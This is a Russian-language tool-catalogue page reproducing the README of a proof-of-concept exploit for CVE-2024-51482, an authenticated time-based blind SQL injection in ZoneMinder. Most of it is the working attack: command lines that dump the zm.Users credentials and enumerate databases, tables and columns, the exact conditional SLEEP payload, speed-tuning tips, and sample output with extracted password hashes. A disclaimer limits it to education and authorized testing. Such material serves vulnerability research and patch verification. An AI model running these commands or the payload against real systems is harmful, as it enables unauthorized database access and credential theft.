Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51482-PoC — Аутентифицированная time-based blind SQL-инъекция PoC для ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Инструменты/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

Аутентифицированная time-based blind SQL-инъекция PoC для ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Репозиторий
146 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-51482-PoC

Эксплойт аутентифицированной time-based blind SQL-инъекции для ZoneMinder v1.37. <= 1.37.64*

Обзор

Это proof-of-concept эксплойт для CVE-2024-51482, уязвимости time-based blind SQL-инъекции в функциональности управления событиями ZoneMinder. Эксплойт требует аутентификации и использует условные SLEEP-запросы для извлечения данных из базы данных.

Возможности

  • Аутентифицированная эксплуатация - Вход с учётными данными или сессионной cookie Определение длины - Бинарный поиск для точного определения длины строки перед извлечением
  • Параллельное извлечение - Многопоточное извлечение символов для скорости
  • Опции в стиле sqlmap - Перечисление баз данных, таблиц, столбцов и дамп данных
  • Безопасные настройки по умолчанию - Задержка 3 с, 5 потоков для высокой точности
  • Отслеживание прогресса - Отображение прогресса извлечения в реальном времени с подробным режимом
  • Чистый вывод - Форматированное табличное отображение дамп-данных

Требования

pip install requests

Быстрый старт

Режим по умолчанию - Дамп учётных данных

python3 poc.py -t example.local -u admin -p password

С сессионной cookie

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Подробный режим

python3 poc.py -t example.local -u admin -p password -v

Использование

Перечисление баз данных

python3 poc.py -t example.local -u admin -p password --dbs

Перечисление таблиц

python3 poc.py -t example.local -u admin -p password -D zm --tables

Перечисление столбцов

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Дамп определённой таблицы

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Параметры

Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Настройка производительности

Безопасный режим (рекомендуется)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Скорость: ~2-3 минуты на хеш пароля
  • Точность: Высокая

Быстрый режим (возможны ошибки)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Скорость: ~30-60 секунд на хеш пароля
  • Точность: Могут появляться неправильные символы

Пример вывода

[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

Принцип работы

  1. Аутентификация - Выполняет вход с учётными данными или использует предоставленную сессионную cookie
  2. Проверка уязвимости - Подтверждает, что цель уязвима, с помощью простого SLEEP-пейлоада
  3. Определение длины - Использует бинарный поиск для точного определения длины строки
  4. Параллельное извлечение - Извлекает все позиции символов одновременно
  5. Отображение данных - Форматирует результаты в чистую таблицу

Формат пейлоада

Эксплойт использует условный SLEEP:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • Истинное условие: Без задержки (0 секунд)
  • Ложное условие: Полная задержка (3 секунды)

Устранение неполадок

Неточные результаты

Если вы получаете неправильные символы (например, $ превращается в 8):

# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Слишком медленно

Если извлечение происходит слишком медленно:

# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

Данные не найдены

Если таблица zm.Users по умолчанию не существует:

# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

Информация о CVE

  • CVE ID: CVE-2024-51482
  • Затронутые версии: ZoneMinder v1.37.* <= 1.37.64
  • Исправлено в: v1.37.65
  • Тип уязвимости: Time-based Blind SQL Injection
  • Оценка CVSS: TBD

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности.

  • Не используйте этот инструмент против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения
  • Несанкционированный доступ к компьютерным системам незаконен
  • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом
  • Всегда получайте надлежащую авторизацию перед проведением оценок безопасности

Ссылки

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Лицензия

Этот проект предоставляется только в образовательных целях. Используйте ответственно и этично.


⭐ Если вы нашли это полезным, поставьте звезду репозиторию!

Скачать инструмент